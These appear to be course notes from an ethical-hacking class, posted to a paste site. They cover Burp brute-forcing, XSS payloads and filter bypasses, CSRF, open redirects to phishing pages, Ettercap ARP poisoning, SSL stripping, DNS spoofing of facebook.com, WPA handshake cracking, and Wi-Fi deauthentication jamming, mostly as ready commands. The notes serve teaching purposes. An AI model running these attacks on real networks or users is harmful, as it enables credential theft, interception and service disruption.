- 1. In the broser ---> goto settings ---> Options
- 2. Goto Proxy ---> settings
- 3. Tick Manual Proxy Configuration - Radio Button
- 4. I will enter the IP Address and the port number
- IP Address --> 127.0.0.1
- Port NUmber --> 8080
- 5. Tick --> Use proxy for all protocols
- 6. No Proxy For ---> localhost, 127.0.0.1 ---> Delete It ---> click on ok
- 7. I will start Burp Suite
- ========================================================================
- 8. Enter the credentials in the web page --> click on login
- 9. Burp will glow ---> data in the burp has been intercepted
- In burp ---> i can see the data inputed by the user.
- 10. I will select all the data ----> right click ---> send to intruder
- 11. Goto Intruder Tab ---> Position Tab
- 12. Select all the data ---> clear all the makrups ---> click on clear button
- 13. Select the user name and add the markup ---> by clicking ADD button
- 14. Select the Password and add the markup ---> by clicking ADD button
- Right Pane
- 15. I will select the attacking type ---> By Default it is sniper, But i will change it to Cluster Bomb
- 16. Nevigate to payload tab
- 17. Add user name in the payload number 1
- 18. Add password name in the payload number 2
- 19. Nevigate to options tab
- 20. grep match <-- Search this box
- 21. Clear all the content inside grep match
- 22. Paste the successful message in that box
- Welcome to the password protected area admin
- Welcome to the password protected area admin
- Command Execution Vulnerability
- ===============================
- In many web applications, there are parameter, which ask for certain type of value. Instead of providing them the exact value, we make them to execute certain terminal commands
- CMD
- Linux --> Bash
- | --> pipe function ---> output of first command will be the input of second command
- File Inclusion Vulnerability
- ============================
- 1. Local File Inclusion Vulnerability
- ../../
- ../
- 2. Remote File Inclusion Vulnerability
- -x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-
- Session 15
- ==========
- Introduction to java script
- ===========================
- Java --> Programming language ---> Used for making applications and softwares
- Javascript --> It is a scripting language, which helps in running some kind of script on the web applications.
- <script>
- ......
- ......
- ......
- ......
- </script>
- <html>
- <head>
- <title>Java Script</title>
- </head>
- <body>
- <script>
- alert("Hacked By Rishi Raj and Team");
- </script>
- </body>
- </html>
- 2 Number Addition
- =================
- html>
- <head>
- <title>Java Script</title>
- </head>
- <body>
- <h1>Calculator</h1>
- <form>
- First Number :<input type="text" id="one"><br>
- Second Number:<input type="text" id="two"><br>
- <button onclick="addition()">Add</button>
- </form>
- </body>
- <script>
- function addition()
- {
- var onee = document.getElementById("one").value;
- var twoo = document.getElementById("two").value;
- var sum= +onee + +twoo;
- alert(sum);
- document.write(sum);
- }
- </script>
- </html>
- XSS --> Cross Site Scripting
- ============================
- In which the web application or the web site executes the html tags as the normal input and displays the data as that using htmls tags.
- In this type of attack attacker can make the target to do what ever he wants to do. An attacker can craft a link and send it to the target, when the target will open the crafter link, then the malicious work of the attacker is carried out.
- There are three types of XSS
- ----------------------------
- 1. Reflected XSS
- 2. Stored XSS
- 3. DOM Based XSS
- 1. Reflected XSS
- ================
- In this type of xss, the attacker can attack a person one time using the crafted link. The attacker can inject the web application just once, then the malicious query will get away.
- <h1>abhijeet</h1>
- <script>alert("hacked")</script>
- <script>alert(document.cookie)</script>
- <iframe src="http://www.lucideus.com"></iframe>
- <script>alert("hacked")</script>
- <>alert("hacked")</script>
- Bypass
- ======
- <script> ---> remove
- <script type="text/javascript">alert("hacked")</script>
- <ScRiPt>alert("hacked")</script>
- <scr<script>ipt>alert("hacked")</script>
- <scr<script>ipt>
- <script>
- 2. Stored XSS
- =============
- An attacker inputs the malicious javascript code into the entry point, and that malicious code is stored in the database. So whenever a user will go to that site of the web application, he will be a target of XSS. This malicious code will remain there in the database until and unless the database administrator does not remove it manually or resets the database.
- Where We can try for stored XSS
- ===============================
- 1. Comments
- 2. Messages
- 3. FAQ
- 4. Form
- 5. RSS Feedback
- 3. DOM Based XSS
- ================
- Documentary Object Model
- In this type of xss, our data is not send to the server, but it is updated dynamically.
- There are 3 entities which are vulnerable in DOM Based XSS
- 1. document.url
- 2. document.location
- 3. document.referal
- DOM Based XSS (or as it is called in some texts, “type-0 XSS”) is an XSS attack wherein the attack payload is executed as a result of modifying the DOM “environment” in the victim’s browser used by the original client side script, so that the client side code runs in an “unexpected” manner. That is, the page itself (the HTTP response that is) does not change, but the client side code contained in the page executes differently due to the malicious modifications that have occurred in the DOM environment.
- https://lucideustech.blogspot.com/2018/03/a-practical-guide-to-dom-based-xss.html
- XSS Payloads
- ============
- <h1>abhijeet</h1>
- <script>alert("hacked")</script>
- <script>alert(document.cookie)</script>
- <iframe src="http://www.lucideus.com"></iframe>
- <input onfocus=javascript:alert(1) autofocus>
- Cheat Sheet
- ===========
- https://gist.github.com/kurobeats/9a613c9ab68914312cbb415134795b45
- -x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-
- Session 16
- ==========
- CSRF --> Cross Site Request Forgery
- ===================================
- It is a client side attack, in which an attacker crafts a malicious link and sends to the target. Using that link the attacker can make the target to do his malicious intents. In this attack, the attacker does not get any kind of data.
- Step 1--> Open the CSRF Vulnerable Website
- Step 2--> Select the element
- Step 3--> Right Click The selected element--->Inspect Code
- Step 4--> Choose the whole form
- Step 5--> Right Click --> Edit as HTML
- Step 6--> Copy the whole code
- Step 7--> Paste in notepad --> change the Action field
- Step 8--> Save as .html file and send/upload the link
- Demo
- ====
- <html>
- <img src="https://i.ytimg.com/vi/i_FbQzQQQLI/maxresdefault.jpg">
- <form action="http://127.0.0.1/dvwa/vulnerabilities/csrf/" method="GET"> New password:<br>
- <input autocomplete="off" name="password_new" type="password"><br>
- Confirm new password: <br>
- <input autocomplete="off" name="password_conf" type="password">
- <br>
- <input value="Change" name="Change" type="submit">
- </form>
- </html>
- If my website or web application is on shared hosting server, then only it is possible.
- yougetsignal.com
- Missing Function Level Access Control
- =====================================
- Most web applications verify function level access rights before making that functionality visible in the UI. However, applications need to perform the same access control checks on the server when each function is accessed. If requests are not verified, attackers will be able to forge requests in order to access functionality without proper authorization.
- If there are n number of users
- user 1 --> prashant ---> prashant.php
- user 2 --> rudra -----> rudra.php
- user 3 --> aranjit ---> aranjit.php
- user 4 --> brijesh ----> brijesh.php
- user 5 --> attacker --> Abhijeet ----> Abhijeet.php
- Instead of Abhijeet.php, he will enter prashant.php and will get the access of Prashant's account, without any authentication.
- oyorooms.com/user/asodf?id= abhijeet.php
- abhishek.php
- rahul.php
- sanjeev.php
- kartik.php
- neha.php
- admin.php
- Invalidated Redirects and Forwards
- ==================================
- Web applications frequently redirect and forward users to other pages and websites, and use untrusted data to determine the destination pages. Without proper validation, attackers can redirect victims to phishing or malware sites, or use forwards to access unauthorized pages.
- 127.0.0.1/skdv/redirectTo=welcome.php
- phishingpage.com
- https://www.tinies.com/redirectTo.php?u=http%3A%2F%2Fwww.sapnagroup.com
- https://www.tinies.com/redirectTo.php?u=http://www.lucideus.com
- https://lucideustest.000webhostapp.com/form.html
- Phishing Page
- https://www.tinies.com/redirectTo.php?u=https://lucideustest.000webhostapp.com/form.html
- Tools To Automate VAPT
- ======================
- Netsparker
- -x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-
- Session 17
- ==========
- Linux Basics
- ------------
- Linux is derived from the word unix. Unix was the first OS. Unix was used by the government officials. And was not used by common man.
- Unix Problems
- -------------
- 1. Gov. Officials
- 2. If someone needs to operate, he/she needs to have complete knownledge of commands.
- Linus Torvald
- =============
- He created linux OS. Kernel ---> deploy.
- Open source. --> Any one can download, modify it and upload it. And can be used for our own purpose.
- Kernel ---> Modify ---> Publish --> Copyright
- Linux Kernel ----> Modify ----> Networking ----> Red Hat
- Linux Kernel ----> Modify ----> Application Dev. ----> Fedora
- Linux Kernel ----> GUI ---> User Friendly ----> Ubuntu ---> FoC
- File Architecture
- ------------------
- There are pre defined folder with their pre defined functionalities.
- 1. root --> /
- 2. etc --> Configuration Folder
- It containes all the configuration files
- .conf
- 3. bin --> binary folder
- It contains all the binary file of the linux terminal commands.
- 4. Proc --> Process Folder
- It contains all the process files
- up-time
- time-stat
- 5. Media --> Devices ---> storage Media
- 6. VAR --> Variable Folder
- Files jinka size static nahi hota. The size of the file keeps on increasing.
- temp
- log
- mail
- server
- 7. dev --> Device Folder
- ----> Devices which are currently used by the machine and the OS.
- 8. Home ---> Users ---> contains all the user's data and files
- Linux always treats everything as a file.
- Some Basic Commands
- ===================
- cd---> change directory
- ls---> list directory
- man--> to get the manual of a command
- mkdir--> to make a directory in linux
- cp--> copy a file to another folder
- mv---> move a file to another location
- rm --> to remove a file only
- rmdir---> remove directory
- grep--> to check whether the work is in file or not
- cat --> to read the contents of the file
- locate --> to locate the specific file----> kisi bhi file ok dhundo
- echo --> awaj kro... shor kro... aur btao... to print something on the terminal
- date --> aaj k tareek vo bhi samay k sath.... for viewing the current date and time
- cal --> ye apko pura ka pura calander khol k dedega pure month ka....
- uname --> ye btata h tumko tumhare Linux system k vare m.....
- uname -a --> ye dega sari information tumhare Linux System k jaise
- 1. who is the user
- 2. what is the version
- 3. operating system konsa use kr rahe ho
- 4. time
- 5. date
- jb sara kaam ho jaye.... to hum use krenge init 0----. for shutting down the device
- Users and Group
- ===============
- group --> ek jaise users ko ek kamre me bnd kr dena----> colleting and grouping similar users in a group
- -rw-r--r-- 1 root root 1031 Nov 18 09:22 /etc/passwd
- The next three characters (rw-) define the owner’s permission to the file. In this example, the file owner has read and write permissions only. The next three characters (r--) are the permissions for the members of the same group as the file owner (which in this example is read only). The last three characters (r--) show the permissions for all other users and in this example it is read only.
- chmod --> kisi bhi file k execution krne ka tareeka hm change kr sakte h.... ya hum set kr sakte h k is file ko konsa user chala sakta h ya use kr sakta h
- iske bhi alag alag tareeke hote h
- chmod 754 filename
- 4 stands for "read",
- 2 stands for "write",
- 1 stands for "execute", and
- 0 stands for "no permission."
- So 7 is the combination of permissions 4+2+1 (read, write, and execute), 5 is 4+0+1 (read, no write, and execute), and 4 is 4+0+0 (read, no write, and no execute).
- su --> to change user---> agr tum koi kaam khud se nahi krna chahte.... to tum ya to apne dost ko kahoge ya apne kisi bhai ko....
- sudo --> super user do ---> papa se kuch kaam krne k liye kehena... jo beta nahi kehe sakta
- sudo adduser <username>
- Basic Networking
- ================
- ab sb kuch to set kr lia.... now i want to set an internet connection and see it's ip address and configuration... to me use karunga 'ifconfig'
- ifconfig --> interface configuration
- route -n
- ping
- traceroute
- nslookup
- netstat
- crunch <min-length> <max-length>
- -x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-
- Session 18
- ==========
- Network Security
- ----------------
- Information Gathering ---> Network Based
- ----------------------------------------
- In this type of information gathering we prefer to gather the information about the network.
- Number of connected device
- IP Allocated
- MAC Address
- Host Name
- 1. Normal Information Gathering
- 2. Advance|Intelligent Information Gathering
- 1. Normal Information Gathering
- -------------------------------
- In this type of information gathering, we just get the limited data,
- IP Address
- MAC Address
- Vendor Name
- netdiscover
- netdiscover -r 192.168.228.1/24
- arp-scan
- arp-scan --local
- 2. Advance|Intelligent Information Gathering
- --------------------------------------------
- In this type of information gathering, we get the information in the very granular way.
- IP Addresses
- Port number
- Services
- Service Version
- OS
- OS Version
- nmap --> Network Maping and exploration tool
- nmap 192.168.228.1-255
- nmap 192.168.228.1/24
- nmap 192.168.228.1-255 -sS -sC -sV
- -sS ---> Service
- -sC ---> More Details
- -sV ---> Version
- Network Attacks
- ---------------
- Free WiFi
- --> CCD
- --> Railway Station
- --> Star Bucks
- --> Costa Cafe
- --> Barista
- --> Subway
- Suppose, there is an intruder in the free wifi, and he is seeing all the data you are transmitting over the network.
- Username
- Passwords
- Which attack he is using?
- -------------------------
- MiTM --> Man In The Middle Attack
- An intruder is listening and seeing (sniffing and spoofing) the data transmitted over by the user. In other words, The attacker is standing between the two nodes of the communication, all the data is going through the attacker's device.
- ARP Poisioning
- ==============
- ARP --> Address Resolution Protocol
- ARP Table ---> Maps IP Address with the MAC Address
- In this attack, the attacked poisons the ARP Cache.
- Ettercap ---> It is a tool which is used for performing MiTM and ARP Poisioning attack in the network. It is pre-installed in Kali Linux.
- Attack
- ======
- 1. Information Gathering
- #arp-scan --local
- 2. Start Ettercap
- #ettercap -G
- G ---> Graphical Version
- Start MiTM Attack
- 1. Goto "Sniff"
- 2. Click on "Unified Sniffing"
- 3. Select the interface ---> eth0
- 4. Goto on "Hosts"
- 5. Click on "Scan For Hosts"
- 6. Goto on "Hosts"
- 7. Click on "Hosts List"
- 192.168.228.137 ---> Target
- Router --> Default Gateway
- #route -n
- 192.168.228.2
- 8. Select default gateway --> 192.168.228.2 ---> Click on "Add To Target 1"
- 9. Select the Target IP Address --> 192.168.228.137 Click on "Add To Target 2"
- 10. Goto "MiTM"
- 11. Click on "ARP Poisioning"
- 12. Check on "Sniff Remote Connections" and click on "OK"
- 13. Goto "Start"
- 14. Click on "Start Sniffing"
- Working
- http://www.vivastreet.co.in
- "Secure Connection Failed"
- https://www.paytm.com
- https://www.linkedin.com
- https://www.instagram.com
- https://www.onlinesbi.com
- https://www.netflix.com
- HTTP --> Hyper Text Transfer Protocol
- HTTPS -> Hyper Text Transfer Protocol Secure
- |
- |--> S=Secure
- |->SSL
- Secure Socket Layer
- 443
- For Performing MiTM and ARP Poisioning on HTTPS websites. We need to do SSL Striping.
- For Performing sslstriping, we need to perform 3 steps
- 1. IP Forwarding
- 2. Traffic Redirection
- 3. SSL Striping
- 1. IP Forwarding
- ================
- To Step up the IP Address and listen for the traffic which is transmitted by SSL.
- #more /proc/sys/net/ipv4/ip_forward
- 0
- #echo "1" > /proc/sys/net/ipv4/ip_forward
- #more /proc/sys/net/ipv4/ip_forward
- 1
- 2. Traffic Redirection
- ======================
- SSL works for port 80.
- Data which is transmitted over port number 80, will be encrypted and protected by SSL. So we will redirect the data from port 80 to any random port, let's say port number 8080.
- #locate etter.conf
- /etc/ettercap/etter.conf
- /usr/share/ettercap/doc/etter.conf.5.pdf
- /usr/share/man/man5/etter.conf.5.gz
- #nano /etc/ettercap/etter.conf
- ec_uid = 0 # nobody is the default
- ec_gid = 0 # nobody is the default
- Scroll Down Until You Find Something Like This
- #---------------
- # Linux
- #---------------
- You will find another line
- #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
- Copy that line and paste it in notepad
- #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
- we need to modify this command.
- iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080 --> This is my commmand
- #iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080
- 3. SSL Striping
- ===============
- Now all the thing is set up, we are good to go. Start the sslstriping tool and use it for port 8080
- #sslstrip -l 8080
- -l --> Listining
- Now we will perform MiTM and ARP Poisioning
- Start Ettercap
- #ettercap -G
- G ---> Graphical Version
- Start MiTM Attack
- 1. Goto "Sniff"
- 2. Click on "Unified Sniffing"
- 3. Select the interface ---> eth0
- 4. Goto on "Hosts"
- 5. Click on "Scan For Hosts"
- 6. Goto on "Hosts"
- 7. Click on "Hosts List"
- 192.168.228.137 ---> Target
- Router --> Default Gateway
- #route -n
- 192.168.228.2
- 8. Select default gateway --> 192.168.228.2 ---> Click on "Add To Target 1"
- 9. Select the Target IP Address --> 192.168.228.137 Click on "Add To Target 2"
- 10. Goto "MiTM"
- 11. Click on "ARP Poisioning"
- 12. Check on "Sniff Remote Connections" and click on "OK"
- 13. Goto "Start"
- 14. Click on "Start Sniffing"
- DNS Poisioning Attack | DNS Spoofing Attack
- ===========================================
- It will let the user to redirect to phishing web page in the network
- www.facebook.com ----> It will go to my IP ADdress where i have hosted another phishing page.
- #locate etter.conf
- /etc/ettercap/etter.conf
- /usr/share/ettercap/doc/etter.conf.5.pdf
- /usr/share/man/man5/etter.conf.5.gz
- #nano /etc/ettercap/etter.conf
- [privs]
- ec_uid = 1234234 # nobody is the default
- ec_gid = 4124123 # nobody is the default
- make ec_uid and ec_gid as 0
- I will scroll down until I find something written as
- -----
- LINUX
- -----
- # if you use iptables:
- #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
- # redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
- Remove the hashed from both the lines
- # if you use iptables:
- redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
- redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
- #ettercap -G
- Sniff ---> Unified Sniffing ---> Network Interface --> eth0
- Hosts ---> Scan For Hosts
- Hosts --> Hosts List
- Select the target 1 as the default gateway
- route -n
- 172.16.226.2
- Select the target 2 as the victim machine
- 172.16.226.154
- MiTM --> ARP Poisioning --> Sniff Remote Connection Only
- Goto "Plugins" --> Manage the Plugins
- Double click "dns_spoof"
- Start ---> Start sniffing
- #locate etter.dns
- /etc/ettercap/etter.dns
- #nano /etc/ettercap/etter.dns
- search where it is written
- www.microsoft.com A *.*.*.*
- enter below
- www.facebook.com A <your IP Address>
- facebook.com A <your IP Address>
- save the file and exit
- #service apache2 start
- /var/www/html/ ---> place your phishing page here
- Xerosploit
- ==========
- Go to google.com
- --> github xerosploit
- --> https://github.com/LionSec/xerosploit
- You will see a green button, ---> Clone or Download
- Copy that link
- --> https://github.com/LionSec/xerosploit.git
- Open a terminal in kali linux and type
- #git clone https://github.com/LionSec/xerosploit.git
- #cd xerosploit
- #python install.py
- -x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-
- Session 19 and Session 20
- =========================
- Wireless Security
- -----------------
- Wireless Technology
- -------------------
- WiFi --> Wireless Fidility
- Bluetooth
- RFID
- IEEE 802.11(a|b|n)
- ------------------
- This is set of standards, which tells me the following things
- -- Number Of devices that can connect
- -- Maximun Data Transmission Speed
- -- Protocols Support
- -- Area Cover
- WiFi
- ====
- 1. WEP
- 2. WPA|WPA2
- BSSID MAC address of the access point. In the Client section, a BSSID of "(not associated)" means that the client
- is not associated with any AP. In this unassociated state, it is searching for an AP to connect with.
- PWR Signal level reported by the card. Its signification depends on the driver, but as the signal gets higher
- you get closer to the AP or the station. If the BSSID PWR is -1, then the driver doesn't support signal
- level reporting. If the PWR is -1 for a limited number of stations then this is for a packet which came
- from the AP to the client but the client transmissions are out of range for your card. Meaning you are
- hearing only 1/2 of the communication. If all clients have PWR as -1 then the driver doesn't support signal
- level reporting.
- RXQ Only shown when on a fixed channel. Receive Quality as measured by the percentage of packets (management
- and data frames) successfully received over the last 10 seconds. It's measured over all management and data
- frames. That's the clue, this allows you to read more things out of this value. Lets say you got 100 per‐
- cent RXQ and all 10 (or whatever the rate) beacons per second coming in. Now all of a sudden the RXQ drops
- below 90, but you still capture all sent beacons. Thus you know that the AP is sending frames to a client
- but you can't hear the client nor the AP sending to the client (need to get closer). Another thing would
- be, that you got a 11MB card to monitor and capture frames (say a prism2.5) and you have a very good posi‐
- tion to the AP. The AP is set to 54MBit and then again the RXQ drops, so you know that there is at least
- one 54MBit client connected to the AP.
- Beacons
- Number of beacons sent by the AP. Each access point sends about ten beacons per second at the lowest rate
- (1M), so they can usually be picked up from very far.
- #Data Number of captured data packets (if WEP, unique IV count), including data broadcast packets.
- #/s Number of data packets per second measure over the last 10 seconds.
- CH Channel number (taken from beacon packets). Note: sometimes packets from other channels are captured even
- if airodump-ng is not hopping, because of radio interference.
- MB Maximum speed supported by the AP. If MB = 11, it's 802.11b, if MB = 22 it's 802.11b+ and higher rates are
- 802.11g. The dot (after 54 above) indicates short preamble is supported. 'e' indicates that the network has
- QoS (802.11e) enabled.
- ENC Encryption algorithm in use. OPN = no encryption,"WEP?" = WEP or higher (not enough data to choose between
- WEP and WPA/WPA2), WEP (without the question mark) indicates static or dynamic WEP, and WPA or WPA2 if TKIP
- or CCMP or MGT is present.
- CIPHER The cipher detected. One of CCMP, WRAP, TKIP, WEP, WEP40, or WEP104. Not mandatory, but TKIP is typically
- used with WPA and CCMP is typically used with WPA2. WEP40 is displayed when the key index is greater then
- 0. The standard states that the index can be 0-3 for 40bit and should be 0 for 104 bit.
- AUTH The authentication protocol used. One of MGT (WPA/WPA2 using a separate authentication server), SKA (shared
- key for WEP), PSK (pre-shared key for WPA/WPA2), or OPN (open for WEP).
- WPS This is only displayed when --wps (or -W) is specified. If the AP supports WPS, the first field of the col‐
- umn indicates version supported. The second field indicates WPS config methods (can be more than one
- method, separated by comma): USB = USB method, ETHER = Ethernet, LAB = Label, DISP = Display, EXTNFC =
- External NFC, INTNFC = Internal NFC, NFCINTF = NFC Interface, PBC = Push Button, KPAD = Keypad. Locked is
- displayed when AP setup is locked.
- ESSID The so-called "SSID", which can be empty if SSID hiding is activated. In this case, airodump-ng will try to
- recover the SSID from probe responses and association requests.
- WEP
- ===
- #iwconfig
- #airmon-ng
- #airmon-ng start wlan0
- #iwconfig
- #airodump-ng wlan0mon
- bssid channel number
- #airodump-ng --bssid <Target's BSSID> -c <Target's Channel Number> -w <File Name In Which I want To Capture the Beacons --> aranjit> wlan0mon
- Wait until the beacons number reaches to 25,000
- #aircrack-ng aranjit-01.cap
- WPA|WPA2
- ========
- When there is a new device connecting
- -------------------------------------
- #iwconfig
- #airmon-ng
- #airmon-ng start wlan0
- #iwconfig
- #airodump-ng wlan0mon
- bssid channel number
- #airodump-ng --bssid <Target's BSSID> -c <Target's Channel Number> -w <File Name In Which I want To Capture the Beacons --> aranjit> wlan0mon
- It will help you to get the WPA handshake
- #aircrack-ng -w /usr/share/wordlists/rockyou.txt aranjit-01.cap
- When there is no new device connecting
- -------------------------------------
- #iwconfig
- #airmon-ng
- #airmon-ng start wlan0
- #iwconfig
- #airodump-ng wlan0mon
- bssid channel number
- #airodump-ng --bssid <Target's BSSID> -c <Target's Channel Number> -w <File Name In Which I want To Capture the Beacons --> aranjit> wlan0mon
- It will help you to get the WPA handshake
- #aireplay-ng -0 10 -a <Router's BSSID> -s <Station's BSSID> wlan0mon
- This will make us capture the handshake
- #aircrack-ng -w /usr/share/wordlists/rockyou.txt aranjit-01.cap
- WiFi Jammer
- ===========
- #aireplay-ng -0 0 -a <Router's BSSID> -s FF:FF:FF:FF:FF:FF wlan0mon
- Desktop Security
- Information Gathering
- Phases of Hacking
- Cyber Laws
- Malware Illustration
- Social Engineering and Phishing Attacks
- OWASP Top 10 Attacks
- SQL Injections
- XXS --> Cross Site Scripting
- Network Exploitation and Security
- Wireless Network Exploitation and Security
- Mobile Device Exploitation
- mimikatz
- Vault 7: year zero
- GET and POST
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement